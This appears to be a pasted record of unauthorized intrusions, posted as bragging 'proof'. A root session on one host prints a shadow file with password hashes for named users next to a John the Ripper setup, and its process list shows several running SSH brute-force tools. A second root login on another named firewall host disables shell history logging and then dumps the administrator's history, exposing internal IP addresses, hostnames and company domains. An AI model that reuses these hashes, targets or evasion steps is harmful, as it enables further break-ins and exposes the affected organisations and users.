john-1.6]# cd run [root@plet run]# ls 128.8.140.206.shadow john.ini restore all.chr john.pot unafs@ alpha.chr lanman.chr unique@ digits.chr mailer* unshadow@ john* password.lst [root@plet run]# cat john.pot [root@plet run]# cat 128.8.140.206.shadow root:1/CYJWaWszA5M:6445:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: ravi:3uX7r/uT9F/7I:11404:::::: patrick:eM61oULnSalhY:12175:::::: [root@plet run]# [root@plet run]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1364 500 ? S May30 0:53 init [3] root 2 0.0 0.0 0 0 ? SW May30 0:00 [keventd] root 3 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU1] root 5 0.0 0.0 0 0 ? SW May30 0:19 [kswapd] root 6 0.0 0.0 0 0 ? SW May30 0:00 [bdflush] root 7 0.0 0.0 0 0 ? SW May30 7:37 [kupdated] root 8 0.0 0.0 0 0 ? SW< May30 0:00 [mdrecoveryd] root 12 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_0] root 13 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_1] root 17 0.0 0.0 0 0 ? SW May30 0:01 [kreiserfsd] root 133 0.0 0.1 2040 1252 ? S May30 0:02 devfsd /dev root 235 0.0 0.0 0 0 ? SW May30 0:00 [khubd] root 965 0.0 0.0 1444 584 ? S May30 20:26 syslogd -m 0 root 973 0.0 0.1 2120 1204 ? S May30 0:04 klogd -2 daemon 2447 0.0 0.0 1392 500 ? S May30 0:00 /usr/sbin/atd named 2464 0.0 1.1 21584 10664 ? S May30 0:00 named -u named named 2469 0.0 1.1 21584 10664 ? S May30 0:12 named -u named named 2470 0.0 1.1 21584 10664 ? S May30 14:31 named -u named named 2471 0.0 1.1 21584 10664 ? S May30 14:29 named -u named named 2472 0.0 1.1 21584 10664 ? S May30 0:37 named -u named named 2473 0.0 1.1 21584 10664 ? S May30 6:00 named -u named root 2490 0.0 0.1 1784 1776 ? SL May30 0:50 ntpd -A root 2532 0.0 0.0 2028 880 ? S May30 3:22 xinetd -stayalive root 2608 0.0 0.2 4860 2024 ? S May30 3:29 sendmail: accepti mail 2623 0.0 0.1 4852 1480 ? S May30 0:00 sendmail: Queue r root 2776 0.0 0.2 7760 2472 ? S May30 0:23 httpd-perl -f /et apache 2780 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et apache 2782 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et apache 2783 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et apache 2785 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et root 2793 0.0 0.4 12524 4140 ? S May30 0:27 httpd -DPERLPROXI root 2880 0.0 0.0 1568 672 ? S May30 0:03 crond root 2948 0.0 0.0 1332 408 vc/2 S May30 0:00 /sbin/mingetty tt root 2949 0.0 0.0 1332 408 vc/3 S May30 0:00 /sbin/mingetty tt root 2950 0.0 0.0 1332 408 vc/4 S May30 0:00 /sbin/mingetty tt root 2951 0.0 0.0 1332 408 vc/5 S May30 0:00 /sbin/mingetty tt root 2952 0.0 0.0 1332 408 vc/6 S May30 0:00 /sbin/mingetty tt msp_info 5845 0.0 0.2 3624 2072 ? S May30 6:00 ./Contagious Kv1c root 9155 0.0 0.2 5296 2584 ? S May30 0:00 sendmail: j4U6ftV root 7600 0.0 0.1 3732 1496 ? S Jun01 0:00 /usr/bin/perl /us apache 7601 0.0 0.2 12828 2620 ? S Jun01 0:00 httpd -DPERLPROXI apache 7602 0.0 0.2 12836 2608 ? S Jun01 0:00 httpd -DPERLPROXI apache 7603 0.0 0.2 12828 2616 ? S Jun01 0:00 httpd -DPERLPROXI apache 7604 0.0 0.2 12820 2608 ? S Jun01 0:00 httpd -DPERLPROXI apache 12589 0.0 0.2 12720 2508 ? S Jun01 0:00 httpd -DPERLPROXI root 1260 0.0 0.1 2328 1072 ? S Jun02 0:00 login -- root apache 4834 0.0 0.2 12824 2612 ? S Jun02 0:00 httpd -DPERLPROXI root 14207 0.0 0.0 2632 764 ? S Jun03 0:12 ./sshbrute -brute root 17152 0.0 0.1 2712 1632 vc/1 S Jun08 0:00 -bash apache 14863 0.0 0.4 12680 4468 ? S Jun09 0:00 httpd -DPERLPROXI root 24042 0.0 0.2 5216 2508 ? S Jun10 0:00 sendmail: j5AFH2V root 25803 0.2 0.0 1648 728 ? S Jun10 10:41 xfsd root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut root 21234 0.0 0.1 2920 1288 ? S Jun13 0:03 /usr/sbin/sshd root 14019 0.0 0.1 5604 1556 ? S 00:41 0:00 sshd: root@notty root 14389 0.0 0.0 1576 696 ? S 00:45 0:00 CROND root 14391 0.0 0.3 6052 3224 ? S 00:45 0:00 sendmail: ./j5DMj root 15324 0.0 0.2 5216 2496 ? S 00:57 0:00 sendmail: j5DMvsV root 17286 0.0 0.1 5608 1576 ? S 01:17 0:00 sshd: root@notty root 17978 0.0 0.1 5604 1564 ? S 01:25 0:00 sshd: root@pts/4 root 18000 0.0 0.1 2696 1620 pts/4 S 01:25 0:00 -bash root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux [root@plet run]# logout ---------------------------------- skew @ histologic: nothing much here but more pr00f skew == tal0n. ---------------------------------- login as: root root@histologic.no-ip.info's password: Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net [root@histofw root]# unset HISTFILE [root@histofw root]# w 07:01:49 up 200 days, 17:40, 0 users, load average: 0.01, 0.02, 0.00 USER TTY LOGIN@ IDLE JCPU PCPU WHAT [root@histofw root]# ls -al total 408 drwx------ 20 root root 4096 Jun 14 05:15 ./ drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../ -rw------- 1 root root 16160 Jun 12 14:42 .bash_history -rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout -rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile -rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc -rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc -rw-r--r-- 1 root root 14 May 12 2004 .desktop drwx------ 3 root root 4096 May 12 2004 Desktop/ drwxr-xr-x 2 root root 4096 May 12 2004 Documents/ drwx------ 2 root root 4096 May 12 2004 drakx/ -rw-r--r-- 1 root root 355 May 12 2004 .fonts.cache-1 drwx------ 3 root root 4096 May 12 2004 .gconf/ drwx------ 2 root root 4096 May 12 2004 .gconfd/ drwx------ 2 root root 4096 May 12 2004 .gnome/ drwx------ 3 root root 4096 May 12 2004 .gnome2/ drwx------ 2 root root 4096 May 12 2004 .gnome2_private/ -rw-r--r-- 1 root root 119 May 12 2004 .gtkrc -rw-r--r-- 1 root root 123 May 12 2004 .gtkrc-2.0 -rw------- 1 root root 0 May 13 2004 .ICEauthority drwxr-xr-x 2 root root 4096 May 12 2004 .icewm/ drwx------ 2 root root 4096 Jun 12 04:00 .irssi/ drwxr-xr-x 4 root root 4096 May 13 2004 .kde/ drwxr-xr-x 2 root root 4096 Jun 2 2004 .mc/ drwxr-xr-x 2 root root 4096 May 12 2004 .mcop/ drwxrwxr-x 3 500 500 4096 Jun 4 2004 noip-2.1.1/ -rw-r--r-- 1 root root 71210 Jun 4 2004 noip-duc-linux.tar.gz drwxr-xr-x 2 root root 4096 May 12 2004 .qt/ -rw------- 1 root root 1024 May 13 2004 .rnd -rw-r--r-- 1 root root 126 May 13 2004 .rpmdrake drwxr-xr-x 5 root root 4096 May 13 2004 sarg-1.4.1/ -rw-r--r-- 1 root root 2034 May 13 2004 sarg-1.4.1-index.sort.patch -rw-r--r-- 1 root root 125589 May 13 2004 sarg-1.4.1.tar.gz -rw-r--r-- 1 root root 329 May 13 2004 sarg_cron.txt -rw-r--r-- 1 root root 177 May 13 2004 sarg_daily.txt -rw-r--r-- 1 root root 612 May 13 2004 sarg_monthly.htm -rw-r--r-- 1 root root 292 May 13 2004 sarg_monthly.txt -rw-r--r-- 1 root root 8368 May 13 2004 sarg.reports.txt -rw-r--r-- 1 root root 435 May 13 2004 sarg_weekly.txt drwx------ 2 root root 4096 May 12 2004 .ssh/ -rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc drwx------ 4 root root 4096 Jun 14 05:14 tmp/ -rw------- 1 root root 5624 Jun 14 05:15 .viminfo -rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc -rw-r--r-- 1 root root 6 May 12 2004 .wmrc -rw------- 1 root root 53 May 13 2004 .Xauthority -rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults -rw------- 1 root root 1478 May 13 2004 .xsession-errors [root@histofw root]# history 5 cd /etc/squid/ 6 ll 7 vi squid.conf 8 vi msntauth.conf 9 dig server1 10 cd /etc/hosts 11 cd /etc 12 vi hosta 13 vi hosts 14 dig server1 15 vi hosts 16 /usr/lib/squid/msnt_auth 17 dmesg 18 scp root@knysna.compumail.co.za:/usr/sbin/bwm /usr/sbin/ 19 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/sbin/ 20 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/bin/ 21 ll 22 dmesg -c 23 vi msntauth.conf 24 /usr/lib/squid/msnt_auth 25 ping 192.168.0.1 26 ping server1 27 cd squid/ 28 vi msntauth.conf 29 /usr/lib/squid/msnt_auth 30 locate msnt_auth 31 cd /usr/lib/squid/ 32 ll 33 cd et 34 cd .. 35 ll 36 cd squid/ 37 ll 38 file msnt_auth 39 view msnt_auth 40 vi /etc/squid/msntauth.conf 41 pwd 42 ./msnt_auth 43 ./msnt_auth -d 44 /etc/init.d/squid restart 45 cd /etc/squid/ 46 vi squid.conf 47 squid check 48 squid -k check 49 squid -k restart 50 /etc/init.d/squid restart 51 tail -f /var/log/squid/access.log 52 ll 53 cd / 54 cd /root/ 55 ll 56 tar zcvf sarg-1.4.1.tar.gz 57 tar zxvf sarg-1.4.1.tar.gz 58 cd sarg 59 cd sarg-1.4.1 60 ll 61 ll .. 62 cd .. 63 tar zxvf sarg-1.4.1-index.sort.patch.gz 64 gunzip sarg-1.4.1-index.sort.patch.gz 65 ll 66 cd sarg-1.4.1 67 patch -? 68 patch --help 69 cd .. 70 ll 71 view sarg-1.4.1-index.sort.patch 72 cd sarg 73 cd sarg-1.4.1 74 patch -c0 < ../sarg-1.4.1-index.sort.patch 75 man patch 76 patch -p0 < ../sarg-1.4.1-index.sort.patch 77 ll 78 ./configure 79 make 80 make install 81 vi Makefile 82 locate man 83 locate man | more 84 vi Makefile 85 locate man | more 86 vi Makefile 87 make install 88 cd /etc/shorewall/ 89 vi rules 90 shorewall restart 91 vi rules 92 shorewall restart 93 cat /var/named/office.histologic.co.za.hosts 94 dig server1 95 dig server1.office.histologic.co.za 96 dig server2.office.histologic.co.za 97 vi /etc/nsswitch.conf 98 vi /etc/resolv.conf 99 dig server2.office.histologic.co.za 100 dig www.google.com 101 exit 102 ifconfig 103 ping 196.25.1.1 104 /etc/init.d/iplog status 105 /etc/init.d/iplog restart 106 /etc/init.d/squid status 107 /etc/init.d/squid stop 108 squid -z 109 /etc/init.d/squid start 110 /etc/init.d/squid status 111 tcpdump -i eth1 112 tcpdump -vi eth1 113 tcpdump -vni eth1 114 host 196.37.145.26 115 ssh 196.7.8.54 116 dig -x 165.165.160.224 @196.25.1.1 117 dmesg 118 dmesg -c 119 netstat -rn 120 vi /etc/sysconfig/network 121 /etc/init.d/network restart 122 netstat -rn 123 dmesg -c 124 tcpdump -i eth0 icmp 125 tcpdump -i eth1 icmp 126 vi /etc/shorewall/ 127 netstat -rn 128 tcpdump -i eth1 icmp 129 cd /etc/shorewall/ 130 vi rules 131 shorewall restart 132 dmesg -c 133 dmesg 134 vi /etc/shorewall/rules 135 tcpdump -i eth0 src 192.168.0.10 and dst 192.168.0.1 136 vi /etc/iplog.conf 137 chkconfig --add iplog 138 /etc/init.d/iplog start 139 tail -f /var/log/iplog 140 dig -x 165.165.179.224 141 dig -x 165.165.179.224 @196.25.1.1 142 dig -x 165.165.179.224 @196.168.10.1 143 dig -x 165.165.179.224 @196.168.1.10 144 tail -f /var/log/iplog 145 cd /etc/shorewall/ 146 vi rules 147 vi policy 148 shorewall restart 149 exit 150 vi /usr/sbin/sarg.reports 151 exit 152 /etc/init.d/squid status 153 ping 196.25.1.1 154 dig www.google.com 155 dmesg 156 dmesg -c 157 dig www.google.com 158 dmesg -c 159 ping 196.25.1.1 160 ifconfig 161 ping 192.168.1.10 162 dmesg -c 163 vi /etc/shorewall/rules 164 dmesg 165 dmesg -c 166 vi /etc/shorewall/rules 167 shorewall restart 168 vi /etc/shorewall/rules 169 cd / 170 sarg.reports 171 crontab -e -u root 172 cd /var/www/ 173 ll 174 rm -rf www/ 175 cd html/squid/ 176 ll 177 ll Daily/ 178 df -g 179 df -h 180 exit 181 bwm 182 dmesg -c 183 exit 184 /etc/init.d/fwlogwatch status 185 vi /etc/fwlogwatch.config 186 /etc/init.d/fwlogwatch stop 187 fwlogwatch 188 /etc/init.d/fwlogwatch status 189 /etc/init.d/fwlogwatch 190 /etc/init.d/fwlogwatch restart 191 killall fwlogwatch 192 /etc/init.d/fwlogwatch restart 193 vi /etc/fwlogwatch.config 194 /etc/init.d/fwlogwatch start 195 /etc/init.d/fwlogwatch restart 196 /etc/init.d/fwlogwatch stop 197 tail /var/log/messages 198 vi /etc/fwlogwatch.config 199 /etc/init.d/fwlogwatch restart 200 fwlogwatch 201 /etc/init.d/fwlogwatch restart 202 exit 203 cd /var/www/html/ 204 ll fwlog.html 205 vi /etc/fwlogwatch.config 206 tail -f /var/log/messages 207 vi /etc/fwlogwatch.config 208 exit 209 /etc/init.d/adsl restart 210 dir 211 /etc/init.d/adsl 212 ifconfig 213 netstat -rn 214 ping 198.168.1.10 215 etc/intit.d/network restart 216 /etc/init.d/network restart 217 ping 192.168.1.10 218 exit 219 /etc/init.d/adsl restart 220 exit 221 ping 196.15.249.203 222 shorewall status 223 /etc/init.d/squid status 224 /etc/init.d/squid stop 225 /etc/init.d/squid start 226 cledar 227 clea 228 clear 229 cd /etc/squid/ 230 ls 231 vi msntauth.conf 232 cd /home/ 233 ls 234 cd /etc/squid/ 235 vi squid.conf 236 cd /usr/lib/squid/ 237 ls 238 vi msnt_auth 239 ls 240 /etc/init.d/squid stop 241 ls 242 vi msnt_auth 243 tail -f /var/log/messages 244 route 245 ping 192.168.1.10 246 /etc/init.d/squid start 247 tail -f /var/log/messages 248 poweroff 249 dmesg 250 clear 251 top 252 dmesg 253 clear 254 /etc/init.d/squid status 255 shorewall status 256 dmes 257 dmesg 258 exit 259 bwm 260 cd /etc/squid/ 261 ls 262 locate 263 locate access.log 264 cd /var/log/squid 265 ls 266 ls -l 267 bwm 268 ls 269 mv access.log access.log.0206 270 vi access.log 271 ls 272 vi access.log 273 ls 274 vi access.log 275 ls 276 mc 277 mv cache.log cache.log.0206 278 vi cache.log 279 ls 280 mc 281 ls 282 bwm 283 bwm 284 ifconfig 285 tcpdump -ni eth1 286 /etc/init.d/squid stop 287 ls 288 /etc/init.d/squid start 289 /etc/init.d/squid status 290 tail -f /var/log/messages 291 netconf 292 drakconnect 293 /etc/init.d/named status 294 ifconfig 295 drakconnect 296 ifconfig 297 /etc/init.d/network stop 298 ls 299 ping www.mweb.co.za 300 ping knysna.compumail.co.za 301 ipconfig 302 ifconfig 303 ping 192.168.1.2 304 ping 192.168.1.10 305 cd /etc/ 306 http:// 307 ls 308 vi resolv.conf 309 /etc/init.d/named stop 310 /etc/init.d/named start 311 exit 312 ping plet.compumail.co.za 313 tcpdump -ni eth0 314 tcpdump -ni eth1 315 tcpdump -niv eth1 316 tcpdump -v eth1 317 tcpdump -vi eth1 318 exit 319 ping www.mweb.co.za 320 dmesg -c 321 clear 322 dmesg -c 323 dmesg 324 clear 325 dmesg 326 cd /etc/shorewall/ 327 vi rules 328 /etc/init.d/squid stop 329 dmesg 330 dmesg -c 331 clear 332 dmesg -c 333 dmesg 334 clear 335 dmesg 336 tcpdump -ni eth1 337 bwm 338 clear 339 dmesg 340 /etc/init.d/squid start 341 tail -f /var/log/messages 342 vi rules 343 shorewall check 344 shorewall restart 345 exit 346 cd /etc/shorewall/ 347 vi rules 348 shorewall check 349 shorewall restart 350 ping www.mweb.co.za 351 ping knysna.compumail.co.za 352 ping www.saix.net 353 exit 354 ssh knysna.compumail.co.za 355 cd /etc/shorewall/ 356 cat rules 357 dmesg 358 clear 359 dmesg 360 ping pop.worldonline.co.za 361 cd /etc/ 362 vi services 363 vi shorewall/rules 364 dmesg 365 bwm 366 dmesg 367 cd /etc/shorewall/ 368 exit 369 bwm 370 dmesg 371 dmesg -c 372 cd /var/log/messages 373 cd /var/log/ 374 tail messages 375 tail syslog 376 tail squid/access.log 377 vi /etc/resolv.conf 378 ifconfig 379 vi /etc/resolv.conf 380 dig www.google.com 381 dig www.lanlink.co.za 382 ifconfig 383 ping 196.25.1.1 384 ping 385 dmesg 386 vi /etc/shorewall/rules 387 vi /etc/shorewall/interfaces 388 ifconfig 389 ping 390 dmesg 391 nmap -sP 192.168.1.0/24 392 ping 192.168.1.2 393 netstat -rn 394 ping 192.168.1.10 395 dmesg 396 vi /etc/shorewall/masq 397 ifconfig 398 vi /etc/shorewall/masq 399 shorewall restart 400 vi /etc/shorewall/masq 401 vi /etc/shorewall/rules 402 shorewall restart 403 ifconfig 404 dig thatcher.no-ip.info 405 vi /etc/shorewall/rules 406 ssh 196.15.249.203 407 dmesg 408 ifconfig 409 tcpdump -i eth0 410 tcpdump -i eth0 not tcp port 22 411 tcpdump -vvi eth0 not tcp port 22 412 tcpdump -vi eth0 not tcp port 22 413 tcpdump -vi eth0 not tcp port 22 and not tcp port 110 414 tcpdump -i eth0 not tcp port 22 and not tcp port 110 415 tcpdump -ni eth0 not tcp port 22 and not tcp port 110 416 tcpdump -ni eth1 not tcp port 22 and not tcp port 110 417 tcpdump -ni eth1 dst 196.22.164.106 418 tcpdump -ni eth1 not tcp port 22 and not tcp port 110 419 dmesg -c 420 vi /etc/shorewall/rules 421 shorewall restart 422 dmesg -c 423 vi /etc/shorewall/rules 424 shorewall restart 425 dmesg -c 426 exit 427 bwm 428 dmesg 429 dmesg -c 430 dmesg 431 wget 432 lynx 433 lynx www.no-ip.com/client/linux/noip-duc-linux.tar.gz 434 tar zxvf noip-duc-linux.tar.gz 435 cd noip-2.1.1/ 436 ll 437 make 438 make install 439 cd / 440 noip2 -C 441 ps -ef 442 ps -ef | grep noip 443 noip2 -? 444 noip2 445 ps -ef | grep noip 446 ifconfig 447 dmesg 448 dmesg -c 449 noip2 450 noip2 -? 451 dmesg -c 452 bwm 453 exit 454 /etc/init.d/named status 455 /etc/init.d/named 456 exit 457 cd noip-2.1.1/ 458 ll 459 vi README.FIRST 460 cd /etc/init.d/ 461 vi noip2 462 chkconfig 463 chkconfig --add noip2 464 ll 465 chmod +x noip2 466 chkconfig --add noip2 467 ll .. 468 ll 469 cd .. 470 cd rc.d 471 ll 472 cat rc 473 cd .. 474 man chkconfig 475 vi /root/noip-2.1.1/README.FIRST 476 grep initdefault /etc/inittab | awk -F: '{print $2}' 477 ln 478 ln --help 479 ln /etc/rc3.d/S99noip2 /etc/init.d/noip2 480 ln /etc/init.d/noip2 /etc/rc3.d/S99noip2 481 ln /etc/init.d/noip2 /etc/rc0.d/K20noip 482 chkconfig --list | grep on 483 chkconfig --del webmin 484 locate webmin | more 485 exit 486 cd /etc/ 487 vi named.boot named.conf rndc.conf rndc.key 488 exit 489 cd / 490 tar zcvf thatcher.tgz etc/ var/named/ 491 dig fw.singita.co.za 492 dig -x 196.7.8.54 493 dig -x 196.7.8.57 494 dig mx singita.co.za 495 tar zcvf thatcher.tgz etc/ var/named/ var/www/ 496 cd /etc/init.d/ 497 ln /etc/init.d/noip2 /etc/rc.d/rc0.d/K90noip2 498 ln /etc/init.d/noip2 /etc/rc.d/rc1.d/K90noip2 499 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/S10noip2 500 ln /etc/init.d/noip2 /etc/rc.d/rc3.d/S90noip2 501 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/K25noip2 502 rm /etc/rc.d/rc2.d/S10noip2 503 ln /etc/init.d/noip2 /etc/rc.d/rc4.d/S90noip2 504 ln /etc/init.d/noip2 /etc/rc.d/rc5.d/S90noip2 505 ln /etc/init.d/noip2 /etc/rc.d/rc6.d/K08noip2 506 ll 507 cd / 508 tar zcvf thatcher.tgz etc/ var/named/ var/www/ 509 cd /etc/init.d/ 510 exit 511 usname -u 512 uname -a 513 exit 514 /etc/init.d/squid status 515 exit 516 ifconfig 517 route 518 ping www.mweb.co.za 519 reboot 520 dmesg 521 dmesg -c 522 clear 523 dmesg -c 524 dmesg 525 ping www.mweb.co.za 526 dmesg 527 ping www.mweb.co.za 528 ping www.google.com 529 ping knysna.compumail.co.za 530 exit 531 top 532 clear 533 cd /var/log/squid 534 ls 535 ls -l 536 ls 537 ls -l 538 exit 539 dmesg 540 top 541 exit 542 dnsconf 543 netconf 544 drakconnect 545 exit 546 dmesg 547 ping www.mweb.co.za 548 /etc/init.d/named status 549 cd /etc/ 550 vi named.conf 551 ping pop.woroldonline.co.za 552 ping pop.worldonline.co.za 553 telnet pop.worldonline.co.za 110 554 exit 555 dmesg 556 clear 557 dmesg 558 cd /etc/shorewall/ 559 vi rules 560 dmesg 561 vi rules 562 shorewall check 563 shorewall restart 564 vi rules 565 exit 566 /etc/init.d/squid restart 567 dmesg -c 568 bwm 569 man lsd 570 lsd 571 lsof 572 man lsof 573 lsof | more 574 chkconfig --list | grep om 575 chkconfig --list | grep on 576 chkconfig --del numlock 577 chkconfig --del xfs 578 l 579 cd .. 580 ls of | more 581 lsof | more 582 man deffsd 583 man dvffsd 584 man devfsd 585 /etc/init.d/devfsd stop 586 lsof | more 587 588 /etc/init.d/xfs stop 589 exit 590 /etc/init.d/adsl 591 exit 592 dir 593 chdir /etc/init.d/adsl 594 help command 595 help dir 596 dir -l 597 help dir 598 dir -v 599 exit 600 lynx www.google.com 601 vi /etc/squid/squid.conf 602 auth_param basic program /usr/lib/squid/msnt_auth 603 /usr/lib/squid/msnt_auth 604 ls /usr/lib/squid/msnt_auth 605 ll /usr/lib/squid/msnt_auth 606 vi /etc/squid/msntauth.conf 607 cat /etc/hosts 608 ping server1 609 /usr/lib/squid/msnt_auth 610 dmesg -c 611 /usr/lib/squid/msnt_auth 612 dmesg -c 613 lsof | more 614 cd /usr/lib/squid/ 615 ll 616 ls 617 ls ms* 618 ./msnt_auth 619 dmesg -c 620 reboot 621 exit 622 /etc/init.d/squid restart 623 vi /etc/squid/squid.conf 624 /usr/lib/squid/msnt_auth 625 /usr/lib/squid/msnt_auth -d 626 /usr/lib/squid/msnt_auth -D 627 vi /etc/squid/msntauth.conf 628 /usr/lib/squid/msnt_auth 629 dmesg 630 vi /etc/squid/msntauth.conf 631 /usr/lib/squid/msnt_auth 632 dig server1 633 ping server1 634 ping server2 635 vi /etc/squid/msntauth.conf 636 ssh 196.25.45.214 637 /usr/lib/squid/msnt_auth 638 exit 639 ifconfig 640 ping 196.25.1.1 641 netstat -rn 642 vi /etc/sysconfig/network 643 ifconfig 644 vi /etc/sysconfig/network 645 /etc/init.d/network restart 646 vi /etc/sysctl.conf 647 /etc/init.d/network restart 648 ping 196.25.1.1 649 netstat -rn 650 ping 192.168.1.1 651 lynx 192.168.1.1 652 ifconfig 653 lynx 192.168.1.10 654 ping 192.168.1.10 655 vi /etc/sysconfig/network 656 /etc/init.d/network restart 657 ping 196.25.1.1 658 lsof | grep no 659 chkconfig --list 660 chkconfig --list | grep on 661 ping www.google.com 662 ifconfig 663 lsof | grep squid 664 /etc/init.d/squid status 665 squid -z 666 squid -k check 667 /etc/init.d/squid start 668 squid -k check 669 /etc/init.d/squid start 670 /etc/init.d/squid restart 671 tail -f /var/log/squid/cache.log 672 tail -f /var/log/messages 673 /etc/init.d/squid stop 674 ps -ef | grep squid 675 dig server2 676 vi /etc/hosts 677 hostname 678 hostname -? 679 hostname -d office.histologic.co.za 680 hostname -d histofw.office.histologic.co.za 681 hostname histofw.office.histologic.co.za 682 hostname 683 vi /etc/hosts 684 cd /etc/ 685 grep -r office.histologic.co.za * | more 686 vi resolv.conf 687 vi /etc/sysconfig/network 688 grep -r office.histologic.co.za[D * | more 689 grep -r "office.histologic.co.za[D" * | more 690 grep -r "office.histologic.co.za\[D" * | more 691 tail -f /var/log/squid/access.log 692 tail -f /var/log/messages 693 cat /etc/hosts 694 vi /etc/hosts 695 exit 696 cd /etc/rc.d/init.d/ 697 ll noip2 698 vi noip2 699 exit 700 vi /etc/shorewall/rules 701 vi /etc/squid/squid.conf 702 squid -k reconfigure 703 exit 704 /etc/init.d/squid restart 705 dmesg -c 706 vi /etc/squid/squid.conf 707 squid -k reconfigure 708 dmesg -c 709 cd /etc/squid/ 710 vi msntauth.conf 711 vi /etc/hosts 712 squid -k reconfigure 713 /usr/lib/squid/msnt_auth 714 vi /etc/squid/ 715 cat msntauth.conf 716 ping server1 717 ping server2 718 vi /etc/hosts 719 /usr/lib/squid/msnt_auth 720 tail -f /var/log/messages 721 /usr/lib/squid/msnt_auth 722 tail -f /var/log/messages 723 vi /etc/squid/msntauth.conf 724 cat server1 /etc/hosts 725 vi /etc/squid/msntauth.conf 726 cat server1 /etc/hosts 727 vi /etc/hosts 728 vi /etc/squid/msntauth.conf 729 dmesg -c 730 /usr/lib/squid/msnt_auth 731 /etc/init.d/squid stop 732 /usr/lib/squid/msnt_auth 733 exit 734 reboot 735 cd /var/named/ 736 ll 737 vi /etc/named.conf 738 dig www.google.com 739 vi /etc/named.conf 740 ifconfig 741 netstat -rn 742 vi /etc/named.conf 743 /etc/init.d/named restart 744 ifconfig 745 /etc/init.d/named restart 746 ll 747 ifconfig /usr/lib/squid/msnt_auth 748 /usr/lib/squid/msnt_auth 749 /etc/init.d/squid restart 750 ext 751 exit 752 dmesg -c 753 cd /var/named/ 754 ll 755 rm office.histologic.co.za.hosts 756 rndc reload 757 ll 758 /etc/init.d/named restart 759 ll 760 /etc/init.d/squid stop 761 /usr/lib/squid/msnt_auth 762 ll 763 rndc -? 764 rndc reload 765 ll 766 cat /etc/named.conf 767 rndc reload office.histologic.co.za 768 ll 769 tail -f /var/log/messages 770 vi /etc/named.conf 771 /etc/init.d/named restart 772 vi /etc/hosts 773 vi /etc/squid/squid.conf 774 cd /etc/squid/ 775 ll /var/named/ 776 rndc reload office.histologic.co.za 777 ssh 196.15.249.214 778 dmesg -c 779 vi /etc/sysctl.conf 780 exit 781 dmesg -c 782 cd /etc/ 783 vi named.conf 784 ifconfig 785 vi named.conf 786 rmdc reload 787 rndc reload 788 /etc/init.d/named restart 789 vi /etc/shorewall/rules 790 shorewall restart 791 dmesg -c 792 tcpdump -i eth0 793 tcpdump -i eth0 not tcp port 22 794 dmesg -x 795 dmesg -c 796 dig plet.compumail.co.za 797 telnet plet.compumail.co.za 110 798 exit 799 traceroute -n 196.15.249.203 800 exit 801 passwd 802 exit 803 dir 804 exit 805 dir 806 exit 807 cd /etc/squid/ 808 vi msntauth.conf 809 exit 810 cd /etc/shorewall/ 811 vi rules 812 vi interfaces 813 ifconfig 814 vi interfaces 815 vi rules 816 vi /etc/services 817 vi rules 818 shorewall restart 819 tailf -f /var/log/messages 820 tail -f /var/log/messages 821 vi rules 822 shorewall restart 823 vi rules 824 shorewall restart 825 vi rules 826 shorewall restart 827 exit 828 cd /etc/squid/ 829 vi msntauth.conf 830 cat msntauth.conf 831 md /usr/local/squid 832 md /usr/local/squid/etc 833 exit 834 tail -f /var/log/messages 835 tail -f /var/log/messages | grep 196.15.249.205 836 ifconfig 837 ssh plet.compumail.co.za 838 telnet plet.compumail.co.za 110 839 telnet lin02.compumail.co.za 110 840 cd /etc/shorewall/ 841 vi rules 842 tail -f /var/log/messages 843 exit 844 tail -f /var/log/messages 845 ping 192.168.0.1 846 vi /etc/shorewall/rules 847 tail -f /var/log/messages 848 vi /etc/shorewall/rules 849 shorewall restart 850 tail -f /var/log/messages 851 vi /etc/shorewall/rules 852 cat /var/log/messages 853 vi /etc/shorewall/rules 854 ifconfig 855 vi /etc/shorewall/rules 856 shorewall restart 857 vi /etc/shorewall/rules 858 cd /etc/shorewall/ 859 vi policy 860 vi interfaces 861 tail -f /var/log/messages 862 tcpdump 863 tcpdump -ni eth1 864 